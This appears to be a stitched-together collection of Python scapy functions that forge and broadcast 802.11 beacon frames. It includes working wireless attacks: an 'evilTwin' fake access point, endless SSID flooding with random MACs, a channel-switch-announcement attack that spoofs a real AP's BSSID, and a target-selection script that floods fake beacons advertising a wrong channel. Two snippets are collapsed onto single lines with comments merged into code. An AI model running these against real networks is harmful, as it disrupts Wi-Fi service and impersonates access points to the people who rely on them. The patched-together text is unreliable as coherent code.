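def send_beacon_ex(essid, interface, privacy=PRIVACY_NONE, bssid=None, channel=6):
    """
    Convenience function for sending beacons without a thread or creating an instance.

    Builds a single 802.11 beacon frame advertising *essid* and transmits it
    once on *interface* with scapy's ``sendp``.

    Args:
        essid: Network name placed in the SSID element.
        interface: Interface name passed to ``getHwAddr`` and ``sendp``.
        privacy: One of the PRIVACY_* constants, or the strings
            ``'none'``/``'NONE'``, ``'wep'``/``'WEP'``, ``'wpa'``/``'WPA'``.
        bssid: Source/BSSID address; when falsy the interface's own hardware
            address (``getHwAddr``) is used.
        channel: Channel number advertised in the DS Parameter Set element.

    Raises:
        Exception: when *privacy* is none of the accepted values.
    """
    if not bssid:
        bssid = getHwAddr(interface)
    # The DS Parameter Set carries the channel as one byte. The literals below
    # are str, which implies Python 2 scapy; on Python 3 Dot11Elt.info expects
    # bytes — TODO confirm the target interpreter.
    channel = chr(channel)
    # Random starting sequence number so repeated calls do not all begin at 0.
    sequence = randint(1200, 2000)

    # Validate the mode first (the original raised before building anything);
    # the three variants differ only in the capability string and in the
    # elements that follow the DS Parameter Set.
    if privacy in [PRIVACY_NONE, 'none', 'NONE']:
        cap, wpa = 'ESS+short-preamble+short-slot', False
    elif privacy in [PRIVACY_WEP, 'wep', 'WEP']:
        cap, wpa = 'ESS+privacy+short-preamble+short-slot', False
    elif privacy in [PRIVACY_WPA, 'wpa', 'WPA']:
        cap, wpa = 'ESS+privacy+short-preamble+short-slot', True
    else:
        raise Exception('Invalid privacy setting')

    # Header common to all modes: broadcast destination, BSSID as source.
    beacon = (
        RadioTap()
        / Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=bssid, addr3=bssid, SC=sequence)
        / Dot11Beacon(cap=cap)
        / Dot11Elt(ID="SSID", info=essid)
        / Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')
        / Dot11Elt(ID="DSset", info=channel)
    )

    if wpa:
        tail = [
            # Vendor-specific element (ID 221), OUI 00:50:f2 type 1 (WPA1):
            # version 1, one group cipher, one pairwise cipher, one AKM selector.
            Dot11Elt(ID=221, info="\x00\x50\xf2\x01\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x01"),
            # ERP Information (ID 42) and Extended Supported Rates (ID 50).
            Dot11Elt(ID=42, info="\x00"),
            Dot11Elt(ID=50, info="\x30\x48\x60\x6c"),
            # Vendor-specific element (ID 221), OUI 00:50:f2 type 2 (WMM parameters).
            Dot11Elt(ID=221, info="\x00\x50\xf2\x02\x01\x01\x84\x00\x03\xa4\x00\x00\x27\xa4\x00\x00\x42\x43\x5e\x00\x62\x32\x2f\x00"),
        ]
    else:
        # Open and WEP beacons share the same trailing elements; only the
        # 'privacy' capability bit distinguishes them.
        tail = [
            Dot11Elt(ID=42, info="\x04"),
            Dot11Elt(ID=47, info="\x04"),
            Dot11Elt(ID=50, info="\x0c\x12\x18\x60"),
        ]
    for elt in tail:
        beacon = beacon / elt

    sendp(beacon, iface=interface, verbose=False)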
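def setPrivacy(self, value):
    """
    Configure the privacy settings for None, WEP, and WPA.

    Rebuilds ``self.beacon`` from ``self.bssid``, ``self.essid`` and
    ``self.channel`` for the requested mode. A *value* that is none of
    PRIVACY_NONE, PRIVACY_WEP or PRIVACY_WPA leaves ``self.beacon`` untouched
    and raises nothing (kept from the original; callers get no error signal).

    Args:
        value: One of the PRIVACY_NONE / PRIVACY_WEP / PRIVACY_WPA constants.
    """
    if value == PRIVACY_NONE:
        cap, wpa = 'ESS+short-preamble+short-slot', False
    elif value == PRIVACY_WEP:
        cap, wpa = 'ESS+privacy+short-preamble+short-slot', False
    elif value == PRIVACY_WPA:
        cap, wpa = 'ESS+privacy+short-preamble+short-slot', True
    else:
        return

    # Header shared by all three modes; only the capability string differs.
    # The info literals are str, which implies Python 2 scapy — on Python 3
    # Dot11Elt.info expects bytes (TODO confirm).
    beacon = (
        RadioTap()
        / Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)
        / Dot11Beacon(cap=cap)
        / Dot11Elt(ID="SSID", info=self.essid)
        / Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')
        / Dot11Elt(ID="DSset", info=self.channel)
    )

    if wpa:
        tail = [
            # Vendor-specific element (ID 221), OUI 00:50:f2 type 1 (WPA1):
            # version 1, one group cipher, one pairwise cipher, one AKM selector.
            Dot11Elt(ID=221, info="\x00\x50\xf2\x01\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x01"),
            # ERP Information (ID 42) and Extended Supported Rates (ID 50).
            Dot11Elt(ID=42, info="\x00"),
            Dot11Elt(ID=50, info="\x30\x48\x60\x6c"),
            # Vendor-specific element (ID 221), OUI 00:50:f2 type 2 (WMM parameters).
            Dot11Elt(ID=221, info="\x00\x50\xf2\x02\x01\x01\x84\x00\x03\xa4\x00\x00\x27\xa4\x00\x00\x42\x43\x5e\x00\x62\x32\x2f\x00"),
        ]
    else:
        # Open and WEP share the same trailing elements; only the 'privacy'
        # capability bit distinguishes them.
        tail = [
            Dot11Elt(ID=42, info="\x04"),
            Dot11Elt(ID=47, info="\x04"),
            Dot11Elt(ID=50, info="\x0c\x12\x18\x60"),
        ]
    for elt in tail:
        beacon = beacon / elt

    self.beacon = beacon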
def ssidFlood(ssid, senderMAC, channel):
    """
    Transmit a beacon for *ssid* from *senderMAC* on *channel* every 0.1 s until interrupted.

    The frame advertises the 'privacy' capability bit and carries only an SSID
    and a DS Parameter Set element. The outgoing interface is taken from the
    module-level ``args.iface`` rather than from a parameter, so this function
    only works after argument parsing has populated ``args``.

    Args:
        ssid: Network name for the SSID element (its length is set explicitly).
        senderMAC: Address used as both transmitter (addr2) and BSSID (addr3).
        channel: Channel number; encoded as a single byte with ``chr``
            (str, which implies Python 2 scapy — TODO confirm).
    """
    header = RadioTap() / Dot11(type=0, subtype=8,
                                addr1="ff:ff:ff:ff:ff:ff",
                                addr2=senderMAC, addr3=senderMAC)
    body = (Dot11Beacon(cap="ESS+privacy")
            / Dot11Elt(ID="SSID", info=ssid, len=len(ssid))
            / Dot11Elt(ID="DSset", info=chr(channel)))
    # loop=1 makes sendp repeat indefinitely; inter=0.1 spaces the frames.
    sendp(header / body, inter=0.1, iface=args.iface, verbose=False, loop=1)
def evilTwin():
    """
    Endlessly transmit a minimal beacon for the module-level ``ssid`` with a random source MAC.

    Reads the module-level names ``ssid`` and ``interface`` (neither is a
    parameter). The frame has no rate, channel or security elements — only an
    SSID — and ``RandMAC()`` supplies the transmitter/BSSID address. Each
    ``sendp`` call runs with ``verbose=True``, so scapy prints progress for
    every frame. The loop never exits on its own.
    """
    source = RandMAC()
    header = Dot11(type=0, subtype=8,
                   addr1="FF:FF:FF:FF:FF:FF",
                   addr2=source, addr3=source)
    frame = RadioTap() / header / Dot11Beacon() / Dot11Elt(ID="SSID", info=ssid)
    while True:
        sendp(frame, iface=interface, verbose=True)
def dfs_hop_attack(interface: MonitorInterface, ap: AP, essid: str, channel: int):
    """
    Repeatedly inject a beacon for *essid* from ``ap.bssid`` that carries a Channel Switch Announcement.

    The beacon advertises an RSN element (version 1, CCMP group and pairwise
    cipher, PSK AKM, capabilities ``0xcc`` — MFP capable and required per the
    original comments) followed by a Channel Switch Announcement element
    (ID 37: switch mode 0, new channel *channel*, switch count 1). Frames are
    injected every 0.3 s and the loop never exits on its own.

    Note: the RSN body is a str literal while the CSA body is ``bytes``; the
    mix suggests one of them predates a Python 3 port — TODO confirm scapy
    accepts both on the target version.

    Args:
        interface: Monitor-mode interface exposing ``inject``.
        ap: Access point whose ``bssid`` is used as transmitter and BSSID.
        essid: Network name for the SSID element.
        channel: Channel number announced in the CSA element.
    """
    rsn_body = (
        '\x01\x00'          # RSN Version 1
        '\x00\x0f\xac\x04'  # Group Cipher Suite : 00-0f-ac CCMP
        '\x01\x00'          # 2 Pairwise Cipher Suite (next line)
        '\x00\x0f\xac\x04'  # AES Cipher
        '\x01\x00'          # 1 Authentication Key Managment Suite (line below)
        '\x00\x0f\xac\x02'  # Pre-Shared Key
        '\xcc\x00'          # Supports and requires MFP
    )
    mac_header = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff',
                       addr2=ap.bssid, addr3=ap.bssid)
    elements = (Dot11Elt(ID='SSID', info=essid, len=len(essid))
                / Dot11Elt(ID='RSNinfo', info=rsn_body)
                / Dot11Elt(ID=37, len=3, info=bytes([0, channel, 1])))
    pkt = RadioTap() / mac_header / Dot11Beacon(cap=0x9104) / elements
    while True:
        interface.inject(pkt)
        sleep(0.3)
def generateFrame(wifiName, macAddr):
    '''
    Build a beacon frame from a network name and a MAC address.

    The frame is a RadioTap header, a management frame of subtype 8 (beacon)
    addressed to broadcast with *macAddr* as transmitter and BSSID, a beacon
    body with the ESS and privacy capability bits set, and a single SSID
    element whose length is set explicitly. Nothing is transmitted here.

    :wifiName: The network name to place in the SSID element
    :macAddr: The MAC address used as transmitter and BSSID
    '''
    # Assemble the frame layer by layer.
    mac_header = Dot11(type=0, subtype=8,
                       addr1="ff:ff:ff:ff:ff:ff",
                       addr2=macAddr, addr3=macAddr)
    body = Dot11Beacon(cap="ESS+privacy")
    ssid_element = Dot11Elt(ID="SSID", info=wifiName, len=len(wifiName))
    return RadioTap() / mac_header / body / ssid_element
def ssid_packet() -> str:
    """
    Build a beacon for "injected SSID" on ``CHANNEL`` and wrap it in a hand-made A-MPDU frame.

    Returns the raw frame as a str: a 4-byte delimiter, the beacon MPDU, a
    manually computed FCS (``dot11crc``), zero padding to a 4-octet boundary,
    and eight trailing 4-byte units. The structure looks like an 802.11n
    A-MPDU delimiter sequence (length, CRC-8 over the length, signature 0x4E)
    — NOTE(review): confirm against the intended driver/injection path.

    Reads the module-level ``CHANNEL``, ``AP_RATES``, ``get_frequency`` and
    ``dot11crc``. The str literals and ``str(beacon_packet)`` imply Python 2
    scapy.
    """
    ap_mac = '00:00:00:00:00:00'
    # NOTE(review): ``rt`` is built but never included in ``data`` below;
    # looks unintended — confirm whether the RadioTap header should precede
    # the A-MPDU or was deliberately dropped.
    rt = RadioTap(len=18, present='Flags+Rate+Channel+dBm_AntSignal+Antenna', notdecoded='\x00\x6c' + get_frequency(CHANNEL) + '\xc0\x00\xc0\x01\x00\x00')
    # Management frame, subtype 8 (beacon): broadcast destination, all-zero
    # transmitter/BSSID, fixed capability word 0x2105.
    beacon_packet = Dot11(subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=ap_mac, addr3=ap_mac) \
        / Dot11Beacon(cap=0x2105) \
        / Dot11Elt(ID='SSID', info="injected SSID") \
        / Dot11Elt(ID='Rates', info=AP_RATES) \
        / Dot11Elt(ID='DSset', info=chr(CHANNEL))
    # Update sequence number (constant value, so every frame from this function
    # carries the same sequence control — an easy fingerprint in captures).
    beacon_packet.SC = 0x3060
    # Update timestamp (wall-clock seconds as a float; the field is an integer
    # microsecond TSF on the wire — NOTE(review): confirm scapy's conversion).
    beacon_packet[Dot11Beacon].timestamp = time.time()
    # MPDU length counts the 4 FCS bytes appended below as ``maccrc``.
    mpdu_len = len(beacon_packet) + 4
    if mpdu_len % 4 != 0:
        padding = "\x00" * (4 - (mpdu_len % 4))  # Align to 4 octets
    else:
        padding = ""
    # Length occupies the upper bits of the 16-bit delimiter word.
    mpdu_len <<= 4
    # CRC-8 (polynomial 0x07, reflected, final XOR 0xFF) over the packed
    # 16-bit length word.
    crc_fun = crcmod.mkCrcFun(0b100000111, rev=True, initCrc=0x00, xorOut=0xFF)
    crc = crc_fun(struct.pack('<H', mpdu_len))
    # FCS computed here rather than by the NIC/driver.
    maccrc = dot11crc(str(beacon_packet))
    delim_sig = 0x4E
    #print('a-mpdu: len %d crc %02x delim %02x' % (mpdu_len >> 4, crc, delim_sig))
    #hexdump(maccrc)
    # Delimiter: 16-bit length word, 8-bit CRC, 8-bit signature.
    ampdu_header = struct.pack('<HBB', mpdu_len, crc, delim_sig)
    #hexdump(ampdu_header)
    # str / Packet: scapy wraps the leading str in a Raw layer.
    data = ampdu_header / beacon_packet / maccrc / padding
    # Eight trailing 4-byte units ending in the 0x4E signature — presumably
    # empty (null) delimiters; TODO confirm.
    data /= "\x00\x00\x20\x4e" * 8
    data = str(data)
    return data
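def rnd_aps(iface):
    """
    Transmit beacons with a random source MAC for every SSID in ``LEL_AP``, cycling until an error.

    Opens a layer-2 socket on *iface* and loops forever, sending one beacon
    per entry of the module-level ``LEL_AP`` list (SSID prefixed with
    ``b"VOTA "``), with a 1 ms pause between frames. Any ``Exception`` from
    the send path is printed and ends the loop.

    The socket is closed on every exit path. The original closed it only
    inside the ``except`` branch, so a KeyboardInterrupt (not an
    ``Exception`` subclass) left the socket open.

    Args:
        iface: Interface name handed to ``conf.L2socket``.
    """
    s = conf.L2socket(iface=iface)
    # scapy volatile value: the address is resolved when the frame is built.
    # NOTE(review): confirm whether it is re-evaluated per send or fixed once.
    rnd_mac = RandMAC()
    itx = 0
    try:
        while True:
            # SSID is bytes (b"VOTA " + entry) while the Rates body is a str
            # literal; the mix suggests a partial Python 3 port — TODO confirm.
            # addr4 is only emitted when both ToDS and FromDS are set, so it
            # should not appear in a beacon.
            s.send(
                RadioTap()
                / Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=rnd_mac, addr3=rnd_mac, addr4=rnd_mac)
                / Dot11Beacon(cap="ESS")
                / Dot11Elt(ID="SSID", info=b"VOTA " + LEL_AP[itx])
                / Dot11Elt(ID="Rates", info="\x0c\x12\x18\x24\x30\x48\x60\x6c")
                / Dot11Elt(ID="DSset", info=chr(1)))
            itx = (itx + 1) % len(LEL_AP)
            time.sleep(0.001)
    except Exception as e:
        # Best-effort: report and stop, as the original did.
        print(e)
    finally:
        s.close()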
input = wepPkts.__class__(str(wepPkts)[0:-4]) #print(input.summary()) sendp(wepPkts) # Sending a simple packet sender='08:00:27:c6:e4:20' dest='08:00:27:1b:8b:a3' packet=Dot11(addr1=dest,addr2=sender,addr3=sender)/LLC()/SNAP()/IP(src="192.168.3.7",dst="192.168.3.5")/ICMP()/"Hello!" print(packet.summary()) #print(packet.show()) sendp(packet) encPkt = wepEncrypt(packet,'0123456789') print(encPkt.summary()) #print(encPkt.show()) sendp(encPkt) #Sending a Dot11 Beacon packet SSID = 'Test SSID' iface = 'eth0' dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=sender, addr3=sender) beacon = Dot11Beacon() essid = Dot11Elt(ID='SSID',info=SSID, len=len(SSID)) frame = RadioTap()/dot11/beacon/essid print(frame.summary()) sendp(frame, iface=iface)
sniff(iface=iface, prn=PacketHandler) # Target selection phase choice = inputNumber("Please select the target (1-%d): " % (len(ap_list)), 1, len(ap_list)) # ATTACK ssid = ap_list[choice - 1] realChannel = ap_ssidToChannel[ssid] # Compute the fake channel (dist of 6 from the real one) fakeChannel = realChannel - 6 if realChannel > 6 else realChannel + 6 print( "Sending a fake beacons with SSID %s, channel %d (real channel is %d) (10/second)" % (ssid, fakeChannel, realChannel)) sender_mac = RandMAC() dot11 = Dot11(type=0, subtype=8, addr1="ff:ff:ff:ff:ff:ff", addr2=sender_mac, addr3=sender_mac) # Create Dot11 packet beacon = Dot11Beacon(cap="ESS+privacy") # Add privacy essid = Dot11Elt(ID="SSID", info=ssid, len=len(ssid)) # Add ssid echann = Dot11Elt(ID="DSset", info=chr(fakeChannel)) # Add channel frame = RadioTap() / dot11 / beacon / essid / echann # Create finale frame sendp(frame, inter=0.1, iface=iface, loop=1) # Emit the beacon (10 times per second)
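def send_beacon(iface, ssid, mac_address, count, list_path):
    """
    Send RSN-advertising beacons for one SSID/BSSID pair or for every entry of a JSON list.

    Args:
        iface: Interface handed to ``sendp``.
        ssid: SSID to advertise; when None a value from ``random_mac()`` is
            used as the name (original behaviour, kept as-is).
        mac_address: BSSID (addr3); when None a random one is generated.
        count: Number of transmissions; None means 1.
        list_path: Optional path to a JSON file holding a list of objects
            with ``"mac"`` and ``"ssid"`` keys. When given, every entry is
            sent *count* times (one ``sendp`` per entry per round) and the
            single-SSID path is skipped.

    Raises:
        OSError: if *list_path* cannot be opened.
        json.JSONDecodeError: if *list_path* is not valid JSON.

    The JSON file is now read inside a ``with`` block; the original opened
    it and never closed the handle. Every frame is printed with ``show()``
    before it is sent.
    """
    if count is None:
        count = 1
    if ssid is None:
        ssid = random_mac()
    if mac_address is None:
        mac_address = random_mac()

    # RSN element shared by both paths: version 1, group cipher 00:0f:ac:02,
    # two pairwise suites (00:0f:ac:04, 00:0f:ac:02), one AKM 00:0f:ac:02,
    # RSN capabilities 0. The str literal implies Python 2 scapy — on
    # Python 3 Dot11Elt.info expects bytes (TODO confirm).
    rsn_info = ('\x01\x00'
                '\x00\x0f\xac\x02'
                '\x02\x00'
                '\x00\x0f\xac\x04'
                '\x00\x0f\xac\x02'
                '\x01\x00'
                '\x00\x0f\xac\x02'
                '\x00\x00')

    def _build_frame(bssid, name):
        # Transmitter address (addr2) is a fixed locally-administered value
        # while the BSSID (addr3) varies per entry; the pair is a stable
        # fingerprint of frames produced by this function.
        dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff',
                      addr2='22:22:22:22:22:22', addr3=bssid)
        beacon = Dot11Beacon(cap='ESS+privacy')
        essid = Dot11Elt(ID='SSID', info=name, len=len(name))
        rsn = Dot11Elt(ID='RSNinfo', info=rsn_info)
        return RadioTap() / dot11 / beacon / essid / rsn

    if list_path is not None:
        with open(list_path) as fh:
            data = json.load(fh)
        for single_count in range(0, count):
            for single_data in data:
                frame = _build_frame(single_data['mac'], single_data['ssid'])
                frame.show()
                sendp(frame, iface=iface, count=1)

    if list_path is None:
        frame = _build_frame(mac_address, ssid)
        frame.show()
        sendp(frame, iface=iface, count=count)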